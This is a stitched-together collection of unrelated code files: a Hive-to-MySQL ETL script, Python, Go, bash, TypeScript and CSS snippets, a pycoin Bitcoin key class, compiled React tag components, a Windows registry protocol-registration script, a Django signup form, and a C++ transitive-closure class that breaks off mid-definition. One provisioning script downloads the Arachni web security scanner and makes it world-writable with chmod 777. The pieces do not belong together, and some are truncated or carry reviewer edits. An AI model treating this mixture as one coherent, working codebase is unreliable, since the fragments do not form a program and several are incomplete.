# HDFS data directory, drop the old table, and create it fresh.
function create_table() {
    # '|| :' ignores the error when the directory does not exist yet.
    hadoop fs -rm -r ${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE} || :
    hive -e "DROP TABLE IF EXISTS ${HIVE_DB}.${HIVE_TABLE};"
    hive -e "CREATE EXTERNAL TABLE IF NOT EXISTS ${HIVE_DB}.${HIVE_TABLE}(
    data_no String comment '数据项编号',
    data_name String comment '数据项名称',
    major_no String comment '专业编号',
    major_name String comment '专业名称',
    data_cycle String comment '数据统计周期 YEAR 年 MONTH 月 DAY 日 QUARTER 季度 OTHER 其他',
    data_type String comment '数据类型 NUMBER 数值类型 ENUM 枚举类型',
    data_time String comment '数据日期 年YYYY 月YYYYmm 日YYYYMMDD 季度YYYY-1,yyyy-2,yyyy-3,yyyy-4 学期 yyyy-yyyy 学期 yyyy-yyyy-1,yyyy-yyyy-2',
    data_value String comment '数据项值(数字保存数字,如果是数据字典枚举保存key)',
    is_new String comment '是否最新 是YES 否NO',
    create_time String comment '创建时间'
    ) COMMENT '实训基地数量'
    LOCATION '${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE}'"
    fn_log "创建表——实训基地数量:${HIVE_DB}.${HIVE_TABLE}"
}
# Load the metric for ALL semesters: count training bases per major from
# model.major_trainingRoom_detailed and cross-join the metric metadata row
# from assurance.im_quality_data_base_info.
function import_table() {
    hive -e "
    INSERT INTO TABLE ${HIVE_DB}.${HIVE_TABLE}
    select
    c.data_no as data_no,
    c.data_name as data_name,
    a.major_code as major_no,
    a.major_name as major_name,
    c.data_cycle as data_cycle,
    c.data_type as data_type,
    a.semester_year as data_time,
    a.t_count as data_value,
    'NO' as is_new,
    FROM_UNIXTIME(UNIX_TIMESTAMP()) AS create_time
    from
    (
    select
    count(training_base_id) as t_count,
    t.major_code,
    t.major_name,
    t.semester_year
    from model.major_trainingRoom_detailed t
    where t.major_code!=''
    group by t.major_code,
    t.major_name,
    t.semester_year
    ) a,
    assurance.im_quality_data_base_info c where c.data_name ='${DATA_NAME}'
    "
    fn_log "导入数据 —— 实训基地数量:${HIVE_DB}.${HIVE_TABLE}"
}
# Load only the latest data: same aggregation as import_table, restricted
# to the most recent semester_year.
function import_table_new() {
    hive -e "
    INSERT INTO TABLE ${HIVE_DB}.${HIVE_TABLE}
    select
    c.data_no as data_no,
    c.data_name as data_name,
    a.major_code as major_no,
    a.major_name as major_name,
    c.data_cycle as data_cycle,
    c.data_type as data_type,
    a.semester_year as data_time,
    a.t_count as data_value,
    'NO' as is_new,
    FROM_UNIXTIME(UNIX_TIMESTAMP()) AS create_time
    from
    (
    select
    count(training_base_id) as t_count,
    t.major_code,
    t.major_name,
    t.semester_year
    from model.major_trainingRoom_detailed t
    where t.semester_year in
    (select max(s.semester_year) from model.major_trainingRoom_detailed s)
    group by t.major_code,
    t.major_name,
    t.semester_year
    ) a,
    assurance.im_quality_data_base_info c where c.data_name ='${DATA_NAME}'
    "
    fn_log "导入数据 —— 实训基地数量:${HIVE_DB}.${HIVE_TABLE}"
}
# Export the Hive table to MySQL via sqoop, replacing all rows for this
# metric (matched by data_name), then flag the newest data_time as is_new.
function export_table() {
    DATE_TIME=`hive -e "select max(data_time) from ${HIVE_DB}.${HIVE_TABLE} " `
    clear_mysql_data "delete from im_quality_major_data_info where data_name = '${DATA_NAME}';"
    sqoop export --connect ${MYSQL_URL} --username ${MYSQL_USERNAME} --password ${MYSQL_PASSWORD} \
        --table ${TARGET_TABLE} --export-dir ${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE} \
        --input-fields-terminated-by '\0001' --input-null-string '\\N' --input-null-non-string '\\N' \
        --null-string '\\N' --null-non-string '\\N' \
        --columns 'data_no,data_name,major_no,major_name,data_cycle,data_type,data_time,data_value,is_new,create_time'
    clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'NO' where data_name = '${DATA_NAME}';"
    clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'YES' where data_name = '${DATA_NAME}' and data_time='${DATE_TIME}'"
    fn_log "导出数据--实训基地数量:${HIVE_DB}.${TARGET_TABLE}"
}
# Incremental export variant: replace only rows for the newest data_time
# (matched by data_no), then refresh the is_new flags.
function export_table_new() {
    DATE_TIME=`hive -e "select max(data_time) from ${HIVE_DB}.${HIVE_TABLE} " `
    clear_mysql_data "delete from im_quality_major_data_info
    where data_no = '${DATA_NO}' and data_time= '${DATE_TIME}';"
    sqoop export --connect ${MYSQL_URL} --username ${MYSQL_USERNAME} --password ${MYSQL_PASSWORD} \
        --table ${TARGET_TABLE} --export-dir ${BASE_HIVE_DIR}/${HIVE_DB}/${HIVE_TABLE} \
        --input-fields-terminated-by '\0001' --input-null-string '\\N' --input-null-non-string '\\N' \
        --null-string '\\N' --null-non-string '\\N' \
        --columns 'data_no,data_name,major_no,major_name,data_cycle,data_type,data_time,data_value,is_new,create_time'
    clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'NO' where data_no = '${DATA_NO}';"
    clear_mysql_data "update assurance.im_quality_major_data_info set is_new = 'YES' where data_no = '${DATA_NO}' and data_time= '${DATE_TIME}' "
    fn_log "导出数据--实训基地数量:${HIVE_DB}.${TARGET_TABLE}"
}
# Full (non-incremental) pipeline: rebuild the table, load all semesters,
# export to MySQL. The *_new incremental variants above are not invoked here.
create_table
import_table
export_table
def separation(data):
    """Split 3-D data points into two classes by comparing each point's
    first two coordinates against the column-wise minima.

    A point ``p`` goes to class 1 when ``p[0] >= min(x1)`` and
    ``p[1] >= min(x2)``; otherwise to class 0.

    Fixes the original syntax error ``> =`` (space inside the operator)
    -> ``>=``, and removes the unused ``x3`` column.

    NOTE(review): as written, every point trivially satisfies
    ``p[0] >= min(x1)`` and ``p[1] >= min(x2)``, so class 0 is always
    empty; the intended comparison may have been a strict ``>`` — confirm
    with the author.

    Returns:
        (datapoints_class_0, datapoints_class_1) — two lists of points.
    """
    # Guard: min() would raise on an empty dataset.
    if not data:
        return [], []
    x1 = [p[0] for p in data]
    x2 = [p[1] for p in data]
    min_x1 = min(x1)
    min_x2 = min(x2)
    datapoints_class_0 = []
    datapoints_class_1 = []
    for p in data:
        if p[0] >= min_x1 and p[1] >= min_x2:
            datapoints_class_1.append(p)
        else:
            datapoints_class_0.append(p)
    return datapoints_class_0, datapoints_class_1
import fetchWrap from '@/utils/fetch';
/**
 * Fetch the forest-compartment boundary nearest the given coordinate.
 *
 * @param {{lat: number|string, lng: number|string}} coords - decimal
 *   latitude/longitude of the point of interest.
 * @returns {Promise<*>} whatever `fetchWrap` resolves with for the request.
 */
export const getForestBoundary = async ({ lat, lng }) => {
  // Build the query string with URLSearchParams so the coordinate values
  // are URL-encoded instead of being interpolated raw into the URL.
  const params = new URLSearchParams({
    decimalLongitude: lng,
    decimalLatitude: lat,
    size: 10,
  });
  const data = await fetchWrap({
    url: `/api/v1/forest-compartment-boundary?${params.toString()}`,
    method: 'GET',
  });
  return data;
};
|
package adapter
// Example_one demonstrates the adapter pattern: the screen's input port is
// incompatible with the video source's output, so an HDMI2DVIAdapter is
// placed between them to convert the signal.
func Example_one() {
	video := VideoOutputter{}
	video.Start()
	screen := Screen{}
	// VDI port is incompatible with HDMI port, so the
	// following statement would cause a compile error:
	//
	// screen.SetInput(video.GetOutput())
	//
	// To solve this problem, we need to use an adapter.
	adapter := HDMI2DVIAdapter{}
	adapter.SetInput(video.GetOutput())
	screen.SetInput(adapter.GetOutput())
	screen.Play()
	// Output:
	// 0123456789
}
|
#!/bin/bash
# This file contains functions used by other bash scripts in this directory.
# This function echoes the command given by $1 (cmd), then executes it.
# However, if $2 (dryrun) is non-zero, then it only does the echo, not the execution.
# Usage: do_cmd cmd dryrun
# Returns 0 on success, non-zero on failure; if there is an error, the error string is echoed.
function do_cmd {
    if [[ $# -ne 2 ]]; then
        echo "ERROR in do_cmd: wrong number of arguments: expected 2, received $#"
        exit 1
    fi
    local cmd=$1
    local dryrun=$2
    # Quoted so the command echoes exactly as it will be executed
    # (unquoted, word splitting would collapse internal whitespace).
    echo "$cmd"
    if [ "$dryrun" -eq 0 ]; then
        # We use 'eval $cmd' rather than just '$cmd', because the
        # latter doesn't work right if the command contains any quoted
        # strings (e.g., svn ci -m "this is my message")
        eval $cmd
        if [ $? -ne 0 ]; then
            echo "ERROR in do_cmd: error executing command"
            exit 2
        fi
    fi
    return 0
}
# make sure that the given file name argument was provided, and that
# the file exists; exit the script with a usage message if either of
# these is not true
#
# Usage: check_file_arg filename_arg description
# (description is echoed if there is an error)
# Example: check_file_arg "$input_file" "input"
# (note that $input_file must be in quotes)
function check_file_arg {
    local filename=$1
    local description=$2
    if [ -z "$filename" ]; then
        echo "ERROR: Must specify $description file"
        # `Usage` must be defined by the script that sources this file.
        Usage
        exit 1
    fi
    # Quoted so filenames containing spaces are tested correctly.
    if [ ! -f "$filename" ]; then
        echo "ERROR: Can't find $description file: $filename"
        Usage
        exit 1
    fi
}
|
#!/usr/bin/env bats
# Bats integration tests for `docker logout` against a Swarm manager.
load ../helpers

# Tear down the Swarm manager and Docker engines started by the helpers.
function teardown() {
    swarm_manage_cleanup
    stop_docker
}

# FIXME: test body not implemented yet; skipped as a placeholder.
@test "docker logout" {
    skip
}
|
/**
 * Interface for objects that can produce copies of themselves.
 */
export interface IClone {
  /**
   * Create and return a copy of this object.
   * @returns The cloned object
   */
  clone(): Object;

  /**
   * Copy this object's state onto an existing target object.
   * @param target - Target object to copy into
   */
  cloneTo(target: Object): Object;
}
|
#!/bin/bash
# Provisioning script: install Ruby and the Arachni 1.4 web-application
# security scanner under /home/vagrant.

# Abort on any failure so a failed download doesn't silently continue
# into the extract/chmod steps.
set -e

apt-get install -y ruby
cd /home/vagrant
wget https://github.com/Arachni/arachni/releases/download/v1.4/arachni-1.4-0.5.10-linux-x86_64.tar.gz
tar xfvz arachni-1.4-0.5.10-linux-x86_64.tar.gz
# NOTE(review): world-writable permissions (777) are overly permissive;
# kept for compatibility with the original provisioning, but consider 755.
chmod -R 777 /home/vagrant/arachni-1.4-0.5.10
|
/* Shared text styling: 18px Arial (sans-serif fallback) in bright green. */
.text-format {
  font-family: Arial, sans-serif;
  font-size: 18px;
  color: #00ff00;
}
<gh_stars>0
from pycoin import ecdsa
from pycoin.key.validate import netcode_and_type_for_data
from pycoin.networks import address_prefix_for_netcode, wif_prefix_for_netcode
from pycoin.encoding import a2b_hashed_base58, secret_exponent_to_wif,\
public_pair_to_sec, hash160,\
hash160_sec_to_bitcoin_address, sec_to_public_pair,\
is_sec_compressed, from_bytes_32, EncodingError
from .bip32 import Wallet
class Key(object):
    """An ECDSA key for Bitcoin-style networks.

    Wraps exactly one underlying representation -- a BIP32 hierarchical
    wallet, a secret exponent, a public pair, or a hash160 -- and eagerly
    derives every representation (WIF, SEC, hash160, address) that can be
    computed from the given one.
    """
    def __init__(self, hierarchical_wallet=None, secret_exponent=None, public_pair=None, hash160=None,
                 prefer_uncompressed=None, is_compressed=True, netcode='BTC'):
        """
        hierarchical_wallet:
            a bip32 wallet
        secret_exponent:
            a long representing the secret exponent
        public_pair:
            a tuple of long integers on the ecdsa curve
        hash160:
            a hash160 value corresponding to a bitcoin address
        Include at most one of hierarchical_wallet, secret_exponent, public_pair or hash160.
        prefer_uncompressed, is_compressed (booleans) are optional.
        netcode:
            the code for the network (as defined in pycoin.networks)
        """
        # Exactly one representation must be provided (three of four None).
        if [hierarchical_wallet, secret_exponent, public_pair, hash160].count(None) != 3:
            raise ValueError("exactly one of hierarchical_wallet, secret_exponent, public_pair, hash160"
                             " must be passed.")
        if prefer_uncompressed is None:
            prefer_uncompressed = not is_compressed
        self._prefer_uncompressed = prefer_uncompressed
        self._hierarchical_wallet = hierarchical_wallet
        self._secret_exponent = secret_exponent
        self._public_pair = public_pair
        if hash160:
            # A bare hash160 only determines one of the two address forms.
            if is_compressed:
                self._hash160_compressed = hash160
            else:
                self._hash160_uncompressed = hash160
        self._netcode = netcode
        # Derive every representation reachable from the input.
        self._calculate_all()

    @classmethod
    def from_text(class_, text, is_compressed=True):
        """
        This function will accept a BIP0032 wallet string, a WIF, or a bitcoin address.
        The "is_compressed" parameter is ignored unless a public address is passed in.
        """
        data = a2b_hashed_base58(text)
        netcode, key_type = netcode_and_type_for_data(data)
        # Strip the one-byte network prefix.
        data = data[1:]
        if key_type in ("pub32", "prv32"):
            hw = Wallet.from_wallet_key(text)
            return Key(hierarchical_wallet=hw, netcode=netcode)
        if key_type == 'wif':
            # A trailing marker byte indicates a compressed-key WIF.
            is_compressed = (len(data) > 32)
            if is_compressed:
                data = data[:-1]
            return Key(
                secret_exponent=from_bytes_32(data),
                prefer_uncompressed=not is_compressed, netcode=netcode)
        if key_type == 'address':
            return Key(hash160=data, is_compressed=is_compressed, netcode=netcode)
        raise EncodingError("unknown text: %s" % text)

    @classmethod
    def from_sec(class_, sec):
        """
        Create a key from an sec bytestream (which is an encoding of a public pair).
        """
        public_pair = sec_to_public_pair(sec)
        return Key(public_pair=public_pair, prefer_uncompressed=not is_sec_compressed(sec))

    def public_copy(self):
        """
        Create a copy of this key with private key information removed.
        """
        if self._hierarchical_wallet:
            return Key(hierarchical_wallet=self._hierarchical_wallet.public_copy())
        if self.public_pair():
            return Key(public_pair=self.public_pair())
        # A hash160-only key carries no private material; return unchanged.
        return self

    def _calculate_all(self):
        # Default every derived attribute to None if not already set, so
        # attribute access below never raises AttributeError.
        for attr in "_secret_exponent _public_pair _wif_uncompressed _wif_compressed _sec_compressed" \
                " _sec_uncompressed _hash160_compressed _hash160_uncompressed _address_compressed" \
                " _address_uncompressed _netcode".split():
            setattr(self, attr, getattr(self, attr, None))
        if self._hierarchical_wallet:
            if self._hierarchical_wallet.is_private:
                self._secret_exponent = self._hierarchical_wallet.secret_exponent
            else:
                self._public_pair = self._hierarchical_wallet.public_pair
            self._netcode = self._hierarchical_wallet.netcode
        wif_prefix = wif_prefix_for_netcode(self._netcode)
        # secret exponent -> WIF strings and public pair
        if self._secret_exponent:
            self._wif_uncompressed = secret_exponent_to_wif(
                self._secret_exponent, compressed=False, wif_prefix=wif_prefix)
            self._wif_compressed = secret_exponent_to_wif(
                self._secret_exponent, compressed=True, wif_prefix=wif_prefix)
            self._public_pair = ecdsa.public_pair_for_secret_exponent(
                ecdsa.generator_secp256k1, self._secret_exponent)
        # public pair -> SEC encodings and hash160s
        if self._public_pair:
            self._sec_compressed = public_pair_to_sec(self._public_pair, compressed=True)
            self._sec_uncompressed = public_pair_to_sec(self._public_pair, compressed=False)
            self._hash160_compressed = hash160(self._sec_compressed)
            self._hash160_uncompressed = hash160(self._sec_uncompressed)
        address_prefix = address_prefix_for_netcode(self._netcode)
        # hash160s -> addresses
        if self._hash160_compressed:
            self._address_compressed = hash160_sec_to_bitcoin_address(
                self._hash160_compressed, address_prefix=address_prefix)
        if self._hash160_uncompressed:
            self._address_uncompressed = hash160_sec_to_bitcoin_address(
                self._hash160_uncompressed, address_prefix=address_prefix)

    def as_text(self):
        """
        Return a textual representation of this key.

        The most specific available form wins: wallet key, then WIF,
        then address.
        """
        if self._hierarchical_wallet:
            return self._hierarchical_wallet.wallet_key(as_private=self._hierarchical_wallet.is_private)
        if self._secret_exponent:
            return self.wif()
        return self.address()

    def hierarchical_wallet(self):
        # The underlying BIP32 wallet, or None.
        return self._hierarchical_wallet

    def hwif(self, as_private=False):
        """
        Return a textual representation of the hierarchical wallet (reduced to public), or None.
        """
        if self._hierarchical_wallet:
            return self._hierarchical_wallet.wallet_key(as_private=as_private)
        return None

    def secret_exponent(self):
        """
        Return an integer representing the secret exponent (or None).
        """
        return self._secret_exponent

    def public_pair(self):
        """
        Return a pair of integers representing the public key (or None).
        """
        return self._public_pair

    def _use_uncompressed(self, use_uncompressed):
        # Resolve an explicit True/False request, or fall back to this
        # key's preference when the caller passes None.
        if use_uncompressed:
            return use_uncompressed
        if use_uncompressed is None:
            return self._prefer_uncompressed
        return False

    def wif(self, use_uncompressed=None):
        """
        Return the WIF representation of this key, if available.
        If use_uncompressed is not set, the preferred representation is returned.
        """
        if self._use_uncompressed(use_uncompressed):
            return self._wif_uncompressed
        return self._wif_compressed

    def sec(self, use_uncompressed=None):
        """
        Return the SEC representation of this key, if available.
        If use_uncompressed is not set, the preferred representation is returned.
        """
        if self._use_uncompressed(use_uncompressed):
            return self._sec_uncompressed
        return self._sec_compressed

    def hash160(self, use_uncompressed=None):
        """
        Return the hash160 representation of this key, if available.
        If use_uncompressed is not set, the preferred representation is returned.
        """
        if self._use_uncompressed(use_uncompressed):
            return self._hash160_uncompressed
        return self._hash160_compressed

    def address(self, use_uncompressed=None):
        """
        Return the public address representation of this key, if available.
        If use_uncompressed is not set, the preferred representation is returned.
        """
        if self._use_uncompressed(use_uncompressed):
            return self._address_uncompressed
        return self._address_compressed

    def subkey(self, path_to_subkey):
        """
        Return the Key corresponding to the hierarchical wallet's subkey (or None).
        """
        # Implicitly returns None when there is no hierarchical wallet.
        if self._hierarchical_wallet:
            return Key(hierarchical_wallet=self._hierarchical_wallet.subkey_for_path(str(path_to_subkey)))

    def subkeys(self, path_to_subkeys):
        """
        Return an iterator yielding Keys corresponding to the
        hierarchical wallet's subkey path (or just this key).
        """
        if self._hierarchical_wallet:
            for subwallet in self._hierarchical_wallet.subkeys_for_path(path_to_subkeys):
                yield Key(hierarchical_wallet=subwallet)
        else:
            yield self
|
<reponame>JarredStanford/JarredStanford.github.io<gh_stars>0
var __extends = (this && this.__extends) || (function () {
var extendStatics = function (d, b) {
extendStatics = Object.setPrototypeOf ||
({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) ||
function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; };
return extendStatics(d, b);
};
return function (d, b) {
extendStatics(d, b);
function __() { this.constructor = d; }
d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __());
};
})();
// TypeScript-emitted __assign helper: Object.assign with an own-property
// copy fallback. Self-replaces on first call so later calls skip the check.
var __assign = (this && this.__assign) || function () {
    __assign = Object.assign || function (target) {
        for (var i = 1; i < arguments.length; i++) {
            var source = arguments[i];
            for (var key in source) {
                if (Object.prototype.hasOwnProperty.call(source, key)) {
                    target[key] = source[key];
                }
            }
        }
        return target;
    };
    return __assign.apply(this, arguments);
};
// TypeScript-emitted __rest helper: shallow-copies `s` minus the keys listed
// in `e` (string keys first, then own enumerable symbol keys).
var __rest = (this && this.__rest) || function (s, e) {
    var t = {};
    for (var p in s) {
        if (Object.prototype.hasOwnProperty.call(s, p) && e.indexOf(p) < 0) {
            t[p] = s[p];
        }
    }
    if (s != null && typeof Object.getOwnPropertySymbols === "function") {
        var symbols = Object.getOwnPropertySymbols(s);
        for (var i = 0; i < symbols.length; i++) {
            var sym = symbols[i];
            if (e.indexOf(sym) < 0 && Object.prototype.propertyIsEnumerable.call(s, sym)) {
                t[sym] = s[sym];
            }
        }
    }
    return t;
};
import React, { Component } from 'react';
import { findDOMNode } from 'react-dom';
import { Box, Keyboard, Text, } from 'grommet';
import { FormClose } from 'grommet-icons/icons/FormClose';
import { Tag } from '../Tag';
/**
 * Adapter that renders Tags inside a Select-style component: returns a
 * renderer receiving { placeholder, value, onChange } from the host.
 * Tag clicks stop propagation so they do not toggle the host control.
 */
export var TagsSelect = function (props) {
    var safeProps = props || { tagProps: {} };
    var tagProps = safeProps.tagProps;
    var rest = __rest(safeProps, ["tagProps"]);
    return function (renderArgs) {
        var placeholder = renderArgs.placeholder;
        var value = renderArgs.value;
        var onChange = renderArgs.onChange;
        var mergedTagProps = __assign({}, tagProps, { onClick: function (e) { return e.stopPropagation(); } });
        return (React.createElement(Tags, __assign({ focusable: false, placeholder: placeholder, value: value, onChange: onChange, tagProps: mergedTagProps }, rest)));
    };
};
/**
 * A list of tags that can be removed.<br/>
 * `import { Tags } from 'grommet-controls';`<br/>
 * `<Tags />`<br/>
 */
// ES5 class emitted from TypeScript: a keyboard-navigable list of removable
// tags. `value` may be a single tag or an array; selecting a tag toggles its
// membership and reports the new array through `onChange`.
var Tags = /** @class */ (function (_super) {
    __extends(Tags, _super);
    function Tags() {
        var _this = _super !== null && _super.apply(this, arguments) || this;
        // selectedTagIndex: index of the tag with keyboard focus (-1 = none).
        _this.state = {
            selectedTagIndex: -1,
        };
        // One ref per rendered Tag so arrow keys can move DOM focus.
        _this.tagRefs = [];
        _this.elementRef = React.createRef();
        // Toggle `selected` within the value array and notify via onChange.
        _this.selectTag = function (selected) {
            var _a = _this.props, onChange = _a.onChange, value = _a.value;
            if (onChange) {
                var tags = selected;
                if (Array.isArray(value)) {
                    var index = value.indexOf(tags);
                    if (index !== -1) {
                        // Already present: remove it.
                        tags = value.filter(function (item) { return item !== selected; });
                    }
                    else {
                        // Not present: append it.
                        tags = value.concat([tags]);
                    }
                }
                else {
                    tags = [tags];
                }
                onChange({ target: findDOMNode(_this.elementRef.current), option: selected, value: tags });
            }
        };
        // Right-arrow handler: focus the next tag, wrapping to the first.
        _this.onNextTag = function (event) {
            var value = _this.props.value;
            var selectedTagIndex = _this.state.selectedTagIndex;
            event.preventDefault();
            var index = selectedTagIndex + 1;
            if (index >= value.length) {
                index = 0;
            }
            _this.focusTag(index);
        };
        // Left-arrow handler: focus the previous tag, wrapping to the last.
        _this.onPreviousTag = function (event) {
            var selectedTagIndex = _this.state.selectedTagIndex;
            var value = _this.props.value;
            event.preventDefault();
            var index = selectedTagIndex - 1;
            if (index < 0) {
                index = value.length - 1;
            }
            _this.focusTag(index);
        };
        // Enter/Space handler: toggle the currently focused tag.
        _this.onSelectTag = function (event) {
            var value = _this.props.value;
            var selectedTagIndex = _this.state.selectedTagIndex;
            if (selectedTagIndex >= 0 && selectedTagIndex < value.length) {
                event.preventDefault(); // prevent submitting forms
                event.stopPropagation();
                _this.selectTag(value[selectedTagIndex]);
            }
        };
        // Close-icon click: remove the tag without triggering parent onClick.
        _this.onCloseClick = function (e, tag) {
            e.stopPropagation();
            _this.selectTag(tag);
        };
        return _this;
    }
    // Move DOM focus to the tag at `index` and record it in state.
    Tags.prototype.focusTag = function (index) {
        if (index >= 0 && index < this.tagRefs.length) {
            var tagElement = findDOMNode(this.tagRefs[index].current);
            if (tagElement && typeof tagElement.focus === 'function') {
                tagElement.focus();
            }
            this.setState({ selectedTagIndex: index });
        }
    };
    Tags.prototype.render = function () {
        var _this = this;
        var _a = this.props, placeholder = _a.placeholder, children = _a.children, value = _a.value, onChange = _a.onChange, focusable = _a.focusable, onClick = _a.onClick, direction = _a.direction, icon = _a.icon, tagProps = _a.tagProps, rest = __rest(_a, ["placeholder", "children", "value", "onChange", "focusable", "onClick", "direction", "icon", "tagProps"]);
        var noValues;
        if ((!value || (Array.isArray(value) && value.length === 0))) {
            noValues = React.isValidElement(placeholder) ? placeholder : (
            // placeholder. minimum height of icon to keep size
            React.createElement(Text, { color: 'placeholder', style: { minHeight: '24px' } }, placeholder || 'No selection'));
        }
        // Normalize `value` to an array for rendering.
        var values;
        if (Array.isArray(value)) {
            values = value;
        }
        else {
            values = value ? [value] : [];
        }
        return (React.createElement(Keyboard, { onEnter: this.onSelectTag, onSpace: this.onSelectTag, onLeft: this.onPreviousTag, onRight: this.onNextTag },
            React.createElement(Box, __assign({ tabIndex: focusable ? 0 : undefined, ref: this.elementRef, direction: direction, overflow: 'auto', style: { minWidth: 'auto' } }, rest), noValues || values.map(function (tag, index) {
                // A render-prop child takes over rendering of each tag.
                if (children) {
                    return children(tag, index, value);
                }
                // Lazily allocate one ref per tag index.
                if (!_this.tagRefs[index]) {
                    _this.tagRefs[index] = React.createRef();
                }
                return (React.createElement(Tag, __assign({ key: "tag_" + tag + "_" + index, ariaChecked: true, a11yTitle: "Remove " + tag.toString(), label: typeof tag !== 'object' ? tag.toString() : undefined, ref: _this.tagRefs[index], onClick: onClick ? function (e) { return onClick(e, tag); } : undefined, onChange: onChange ? function (e) { return _this.onCloseClick(e, tag); } : undefined, icon: icon }, (typeof tag === 'object' ? __assign({}, tagProps, tag) : tagProps))));
            }))));
    };
    Tags.defaultProps = {
        pad: 'small',
        focusable: true,
        margin: { horizontal: 'xsmall', vertical: 'small' },
        value: [],
        gap: 'xsmall',
        direction: 'row-responsive',
        icon: React.createElement(FormClose, null),
    };
    return Tags;
}(Component));
export { Tags };
|
class Migration:
    """Collects named migration tasks and runs them in registration order."""

    def __init__(self):
        # FIFO list of registered migration names.
        self.migration_tasks = []

    def create_migration(self, migration_name):
        """Register a migration to be executed later."""
        self.migration_tasks.append(migration_name)

    def run_migrations(self):
        """Announce each registered migration, oldest first."""
        for task in self.migration_tasks:
            print("Running migration: {}".format(task))
# Demonstration of usage
migration_manager = Migration()
for migration_name in ("CreateUsersTable", "CreatePostsTable"):
    migration_manager.create_migration(migration_name)
migration_manager.run_migrations()
// Write a .reg file first, then invoke it via the shell to register the
// chrome-app:// URL protocol on Windows.
// http://blog.pulipuli.info/2017/03/windowssystem-protocol-open-windows.html?m=1
const fs = require('fs');

// Directory containing the current executable (keeps the trailing "\").
var dirname = process.execPath;
dirname = dirname.slice(0, dirname.lastIndexOf("\\") + 1);

// BUGFIX: dirname already ends with a backslash, so do not prepend another
// one (the old code produced "...\\open-chrome-app.exe").
var exePath = dirname + "open-chrome-app.exe";
// BUGFIX: .reg syntax requires every backslash escaped; String.replace with
// a string pattern only replaced the FIRST one. split/join replaces all.
exePath = exePath.split("\\").join("\\\\");

// Registry script body. Note: inside this template literal "\\" emits one
// backslash into the file and "\\\"" emits an escaped quote, which is what
// .reg syntax needs (the old single "\c"/"\"" escapes were silently eaten
// by JavaScript, producing an invalid file).
var reg = `Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\\chrome-app]
@="URL:Chrome APP mode"
"URL Protocol"=""

[HKEY_CLASSES_ROOT\\chrome-app\\DefaultIcon]
@="` + exePath + `"

[HKEY_CLASSES_ROOT\\chrome-app\\shell]
@=""

[HKEY_CLASSES_ROOT\\chrome-app\\shell\\open]
@=""

[HKEY_CLASSES_ROOT\\chrome-app\\shell\\open\\command]
@="` + exePath + ` \\"%1\\""`;

var regFilePath = "register-system-protocol.reg";
fs.writeFile(regFilePath, reg, function (err) {
    if (err) {
        return console.log(err);
    }
    const { exec } = require('child_process');
    // Launching the .reg file asks Windows to import it.
    exec(regFilePath);
});
from django.contrib.auth.forms import UserCreationForm
class SignUpForm(UserCreationForm):
    """User registration form with friendlier field labels."""

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.fields['username'].label = 'Display Name'
        # NOTE(review): the stock UserCreationForm declares no 'email' field,
        # so indexing self.fields['email'] unconditionally raises KeyError
        # unless a Meta/subclass adds it. Guarded to avoid crashing —
        # TODO: confirm whether the intended Meta declares 'email'.
        if 'email' in self.fields:
            self.fields['email'].label = 'Email Address'
# NOTE(review): these statements appeared at module level with a bare
# `return`, which is a SyntaxError; they only make sense inside a Django
# view. Wrapped in a view function accordingly — confirm the intended view
# name and that `render` is imported at the top of the real file.
def register(request):
    """Render the signup page; create the user when the POST validates."""
    form = SignUpForm(data=request.POST or None)
    if form.is_valid():
        new_user = form.save(commit=False)
        new_user.save()
    # Re-render with validation errors (or the empty form) otherwise.
    return render(request, 'register.html', {'form': form})
<reponame>phisco/advance_algorithms_project<filename>my_transitive_closure.cpp
#include "include_and_types.cpp"
#include <set>
#include <boost/graph/detail/set_adaptor.hpp>
typedef graph_traits<Graph>::adjacency_iterator adj_iter;
template <class Root, class InComponent, class Num, class Set>
class TransitiveClosure{
private:
//Graph
Graph*g;
//Property Map instances
Root root;
InComponent inComp;
Num num;
Set succ;
int index;
//Data Structure feeding Property Map instances
std::vector<Vertex> rootVet;
std::vector<bool> inCompVet;
std::vector<std::set<Vertex>*> sets;
std::vector<int> numVet;
std::vector<std::set<Vertex>> vect;
std::stack<Vertex> s;
/**
* This function is the body of the algorithm. It takes the vertex that the procedure is visiting in that time
* and calculates its successors.
* This is the C++ implementation of the pseudocode available on the Nuutila's paper
* @param v, vertex visited
*/
void tc(Vertex v){
++index;
put(root, v, v);
put(inComp, v, false);
put(num, v, index);
put(succ,v,&vect[v]);
std::set<Vertex> roots;
adj_iter ai, a_end;
for(boost::tie(ai, a_end)= adjacent_vertices(v,*g); ai!=a_end;++ai){
Vertex w=*ai;
if(get(num,w)==0)//Checking if w is already visited
tc(w);
if(!get(inComp,get(root,w)))//Checking if w's root is already in a SCC
put(root, v, get(num, get(root,w))<get(num,get(root,v)) ? get(root,w) : get(root,v));
else
//complexity logaritmic in size
roots.insert(get(root,w));
}
std::set<Vertex>::iterator it;
//complexity of set_union: 2*(size_set1+size_set2)-1
//This loop inserts all the vertex in roots and their successors in v's root successors
for(it=roots.begin();it!=roots.end();++it){
Vertex r=*it;
std::set<Vertex>* succRoot=get(succ, get(root,v));
set_union(get(succ,r)->begin(),get(succ,r)->end(),succRoot->begin(), succRoot->end(),
std::inserter(*succRoot,succRoot->begin()));
succRoot->insert(r);
}
if(get(root,v)==v){
if(get(num,s.top())>=get(num,v)){
get(succ,v)->insert(v);
do{
Vertex w=s.top();
s.pop();
put(inComp,w,true);
if(v!=w){
//Pointer assignment, not a copy
std::set_union(get(succ,w)->begin(),get(succ,w)->end(),get(succ,v)->begin(),
get(succ,v)->end(),std::inserter(*get(succ,v),get(succ,v)->begin()));
put(succ,w, get(succ,v));
}
}while(get(num,s.top())>=get(num,v));
}else{
//if a vertex is root of a trivial SCC
put(inComp,v,true);
}
}else{
//If a vertex is not a root, it pushes his root into the stack, if it is not
if(get(num,s.top())!=get(num, get(root,v)))
s.push(get(root,v));
get(succ,get(root,v))->insert(v);
}
}
/**
* This function launches the procedure and it performs the visit of all the graph's vertex
*/
